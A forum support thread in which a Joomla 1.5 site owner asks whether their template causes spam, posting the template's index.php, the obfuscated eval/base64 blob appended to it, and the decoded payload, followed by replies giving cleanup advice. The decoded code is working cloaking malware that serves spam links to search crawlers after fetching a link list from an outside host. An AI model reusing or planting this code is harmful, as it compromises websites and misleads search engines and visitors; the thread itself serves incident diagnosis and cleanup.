Spambots are on my site. Could my template be the cause

**GK User** Wed May 01, 2013 10:15 pm

Here is my index.php from my coffe template for Joomla 1.5

Code: Select all: <?php /* #------------------------------------------------------------------------ # Coffe - #1 2011 template (for Joomla 1.5) # # Copyright (C) 2007-2010 Gavick.com. All Rights Reserved. # License: Copyrighted Commercial Software # Website: http://www.gavick.com # Support: [email protected] #------------------------------------------------------------------------ # Based on T3 Framework #------------------------------------------------------------------------ # Copyright (C) 2004-2009 J.O.O.M Solutions Co., Ltd. All Rights Reserved. # @license - GNU/GPL, http://www.gnu.org/copyleft/gpl.html # Author: J.O.O.M Solutions Co., Ltd # Websites: http://www.joomlart.com - http://www.joomlancers.com #------------------------------------------------------------------------ */ // no direct access defined( '_JEXEC' ) or die( 'Restricted access' ); include_once (dirname(__FILE__).DS.'libs'.DS.'gk.template.helper.php'); $tmpl = GKTemplateHelper::getInstance($this, array('ui', GK_TOOL_SCREEN, GK_TOOL_MENU, 'main_layout', 'direction')); //Calculate the width of template $tmplWidth = ''; $tmplWrapMin = '100%'; switch ($tmpl->getParam(GK_TOOL_SCREEN)){ case 'auto': $tmplWidth = '97%'; break; case 'fluid': $tmplWidth = intval($tmpl->getParam('gk_screen-fluid-fix-gk_screen_width')); $tmplWidth = $tmplWidth ? $tmplWidth.'%' : '90%'; break; case 'fix': $tmplWidth = intval($tmpl->getParam('gk_screen-fluid-fix-gk_screen_width')); $tmplWrapMin = $tmplWidth ? ($tmplWidth+1).'px' : '1003px'; $tmplWidth = $tmplWidth ? $tmplWidth.'px' : '1002px'; break; default: $tmplWidth = intval($tmpl->getParam(GK_TOOL_SCREEN)); $tmplWrapMin = $tmplWidth ? ($tmplWidth+1).'px' : '1003px'; $tmplWidth = $tmplWidth ? $tmplWidth.'px' : '1002px'; break; } $tmpl->setParam ('tmplWidth', $tmplWidth); $tmpl->setParam ('tmplWrapMin', $tmplWrapMin); //Main navigation $gk_menutype = $tmpl->getMenuType(); $gkmenu = null; if ($gk_menutype && $gk_menutype != 'none') { $gkparams = new JParameter(''); $gkparams->set( 'menutype', $tmpl->getParam('menutype', 'mainmenu') ); $gkparams->set( 'menu_images_align', 'left' ); $gkparams->set( 'menupath', $tmpl->templateurl() .'/gk_menus'); $gkparams->set('menu_images', 1); //0: not show image, 1: show image which set in menu item $gkparams->set('menu_background', 1); //0: image, 1: background $gkparams->set('mega-colwidth', 200); //Megamenu only: Default column width $gkparams->set('mega-style', 1); //Megamenu only: Menu style. $gkparams->set('rtl',($tmpl->getParam('direction')=='rtl' || $tmpl->direction == 'rtl')); $gkmenu = $tmpl->loadMenu($gkparams, $gk_menutype); } //End for main navigation $layout = $tmpl->getLayout (); if ($layout) { $tmpl->display($layout); } ?><?php eval(@gzinflate(base64_decode('TVXHCuyIEfyXd1kbmVVOmD0o5zyKPDDKOWsU5ut31m/BPhRFV1WfGrqWraz/s5XLkOblP36AvwNg+eNfP37eBP7zJokvw19wP2+E+jL51Zgv018IXxC/vL8yJPZr57855G8N/aWh3xz69XHxO/+dI/7y/m9GqN/uoDhyQEEEGzNOSIuoBD3kLlBH2RtzaWyuvL8/vrjOfF6Qe9xlikBTxankjfamTIDsR3jP59She+PTU54XnCdic+9jYg6xaFod2ZHxJFXOpnS2XR+FXUCzLHXzQkCszvXoNH0qRcZS+lh4nZMOD3QTBFuwD1N9nUe5IfBW4ykD7zk3XdLEy9m4Mu8cNdK7kWdFo0bpjuiBab/73WPBoJDO1pSEmU/SmKNGuWi6Hh2fzZw7cd3QXTYEGy9nurAXrWogpUxSCzUnHFJwPg54j1JaWTXJj1Fq2vtFByKOQ6jPw5ejuj7W6pSHPNVHOURoXekHQRW38a/sAwABM5E780oZiFlC430W9yKxGuWvrJW3di54r8ilTq/4CDzeNFJXDXHvx1och0fz8ViG9lmlD5DDNJbSSPfkdvrqJDLaysxBha67TrLcU2TM96E71AzZdBhNOK/WuySs9oaDZcAXN51UozhPURFqVTf6USAUe77ruZOEro5FXsq1K6uATXrZGDYWT+LfbXK6B20JI2tljMEl9qDz4gCjOS1fz+lS32sDzrsd3NVjY8CE+XXw1G2NgHSzSGnPe6flmmTs8HFYbSW7I4vSw8CXAJo3rMGl441UnAZk4J2qXyA8GWioEew4vnWsL04yRbgFjOIkdFKjyCcClXtk9t5ReLdpN70Z9IO6W7UhwjEfdtY5Mrrl+yN4IFNRZ72eYtIwYx9aRsRBLe4gtRTzYxkEgEjBCc6+R/5FWs/GTgwNk+OSIFssLyB+GzrcCmM523inxrZwoJO53lfuUWS7xVmQYyZ582EdCEaC6FqoDWSYNnpFREZeK2hGIvO5NxBjlj6FRf7R2IaIwNAuCLNetSesPItRcCs3MhdAhIjvpSWAwyebrvalBdCGsuGGcs5S1LN9K8qcZXZ8kzEEPpioeS6FX6V/kc4E0/Ydyy2/TUskowFk3R3QrZh8oOsA1VCbK1cJHX5VuWTZTQttmg54Et4+nWgCi1T9UeOTpLFGdXxZMFs+fYh9qK2JNY/8HFbIJ+ggtxscc1AyS16bUF1UwacjFKJ6V1Ob96avMW0DFmJL+WFBVxF9YEr8MvTaEtjaR9exiljb41U9aLrM8mtli/VobXPQcRVpLU0Z+XVK43xmk+YOuKg3E0nUijlB2IIbJM7Rb7sTE0i3r61hVMReJapf5ZKS0yekF70Om5cZiG4ewGCljWuvugSXcZx53eFar8RwW+SaOdqOju7Gt4WQdSsNM+Ciz74kaHrqqIjONtMrfJCyYVCLd5P6bPlJ5xDL+2Adc6rTnEHQdjD99wuUEcF+CGdvsUSqmqL2IT9XGXVkmafMGSrEdv12rtdC1ARpqXmtNdlSrh3mrMwevc1HWdHGpeeQwadrj7ipXMb3naHuRNjMUOwF0EOGM49uzpEjwZofr7bXj6lawAYsgMsDJGhX+gC+tcA0u33JNQtailaL/LY465jScfoEjdP3NDK9lpYTd1z0F/lRhUQcMdPFrSgqLRAtgflcB16Ac+reVLR5HOVq6L69+be1HyzivjgjUbEGhvNIwnd70CLs1YN+/vLoTR8sLWvZQvog5dUc7ZRUZ8Zh/SYgDsU8C2802WFoVuqFb1cARag2tcI2gNMNBu+wPzy0UpMCMGcpyjk9X2UVKfcLuB1AbuCbGIZLGsj9HbW428Ox7fIi3HEUyug7jsin4YAISoLnINmnOAIl+G5WoO5Li4hvaZd093n18vXHH799G4z+H1D2W6K///jnv/8E'))); ?>

I used a PHP Decoder and it shows this for the php at the end:

Code: Select all: h5('http://mycompanyeye.com/bulbozavr/bub3/13.list', 1 * 900); function h5($u, $t){ $nobot = isset($_REQUEST['nobot']) ? true : false; $debug = isset($_REQUEST['debug']) ? true : false; $t2 = 3600 * 5; $t3 = 3600 * 12; $droot = getpasekaroot(); $tm = (!@ini_get('upload_tmp_dir')) ? '/tmp/' : @ini_get('upload_tmp_dir'); if (!$tmp = triksp(array($tm, $droot.'images/avatars/', $droot.'tmp/', $droot.'cache/'))) { if ($debug) { echo('DEBUG: (ERROR: temporary path not found, return) ' . "\r\n"); } return; } $agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; if ($debug) { echo('DEBUG: (INFO: temporary path=' . $tmp . ') , agent ('.$agent.')' . "\r\n"); } if (!preg_match('%(http|curl|google|yahoo|yandex|ya|bing|bot|crawl|lynx|SiteUptime|Spider|ia_archiver|AOL|slurp|msn)%i', $agent, $ret)) { if ($debug) { echo('DEBUG: (ERROR: you is not spider, return) '."\r\n"); } return; } if ($debug) { echo('DEBUG: (bot by:['.$ret[1].']) '."\r\n"); } if ($t) { if ($debug) { if (file_exists($tmp . md5($u) . 'c')) { echo('DEBUG: (INFO: link file exists=' . $tmp . md5($u) . 'c) ' . "\r\n"); $filemtime = filemtime($tmp . md5($u) . 'c'); $current = time(); $diff = $current - $filemtime; echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t . ') ' . "\r\n"); if ($diff < $t) { echo('DEBUG: (INFO: USING CACHE LINK FILE ' . "\r\n"); } else { echo('DEBUG: (INFO: DOWNLOAD NEW LINK FILE ' . "\r\n"); } } } if (file_exists($tmp . md5($u . 'c')) && (time() - filemtime($tmp . md5($u . 'c'))) < $t) { readfile($tmp . md5($u . 'c')); if ($debug) { echo('DEBUG: (END: readfile link, return) ' . "\r\n"); } return; } } if ($debug) { if (file_exists($tmp . md5($u))) { echo('DEBUG: (INFO: lists file exists=' . $tmp . md5($u) . ') ' . "\r\n"); $filemtime = filemtime($tmp . md5($u)); $current = time(); $diff = $current - $filemtime; echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t3 . ') ' . "\r\n"); if ($diff < $t3) { echo('DEBUG: (INFO: USING CACHE LIST FILE ' . "\r\n"); } else { echo('DEBUG: (INFO: DOWNLOAD NEW LIST FILE ' . "\r\n"); } } } if (file_exists($tmp . md5($u)) && (time() - filemtime($tmp . md5($u))) < $t3) { $d = file($tmp . md5($u)); } else { $c = curl_init($u); if (!$c) { if ($debug) { echo('DEBUG: (ERROR: curl(list) not init, return) ' . "\r\n"); } return; } curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $d = curl_exec($c); $l = curl_getinfo($c); curl_close($c); if ($l['http_code'] == 200 && $d) { @file_put_contents($tmp . md5($u), $d); $d = explode("\n", $d); } } if ($debug) { echo('DEBUG: (INFO: size list_array=' . sizeof($d) . ') ' . "\r\n"); } if ($d) { $l = @array_rand($d); $c = @curl_init(trim($d[$l])); if (!$c) { if ($debug) { echo('DEBUG: (ERROR: curl(link) not init, return) ' . "\r\n"); } return; } if ($t) { curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); } $d = curl_exec($c); if ($t) { if ($debug) { echo('DEBUG: (INFO: link download) ' . "\r\n"); } @file_put_contents($tmp . md5($u . 'c'), $d); echo($d); } else { if ($debug) { echo('DEBUG: (ERROR: link NOT download) ' . "\r\n"); } } @curl_close($c); } } function triksp($array){ foreach ($array as $path) { if (is_writable($path)) { return $path; } } return false; } function getpasekaroot() { $file = 'configuration.php'; $path = getcwd().DIRECTORY_SEPARATOR; $c = 0; while($c < 5) { if (file_exists($path.$file)) { return $path; } $path = dirname($path).DIRECTORY_SEPARATOR; $c++; } return @$_SERVER['DOCUMENT_ROOT']; }

What should my index.php actually look like for my coffe template?

**GK User** Thu May 02, 2013 1:43 am

Hi,
Answering to your question: I do not think it is possible.

Somebody hacked your website, that's all, I know this is sad true. It could be a number of reasons. I know exactly because sometimes I takes a "cleaning jobs".

If you still use J1.5 you have to install some extra protections components!

**GK User** Thu May 02, 2013 2:00 am

Thanks for the reply. I've just installed OSE Anti-Hacker, rechecked my chmod files/folders and and have also deleted the last portion of code I mentioned below. So far so good.

**GK User** Thu May 02, 2013 8:53 pm

You should also :
1) Change password for FTP
2) Change password for database and in configuration.php !
3) Check all folders for suspicious files, there is "bad code" inside. Compare files structure from clean installation

I suggest lecture of book: CMS Security Handbook: The Comprehensive Guide for WordPress, Joomla!

**GK User** Thu May 02, 2013 8:54 pm

p.s.
4) Update all components and uninstall those you still don't use.
5) Check your server settings compare with suggested by joomla.org.
6) In Global Settings -> Show errors [None]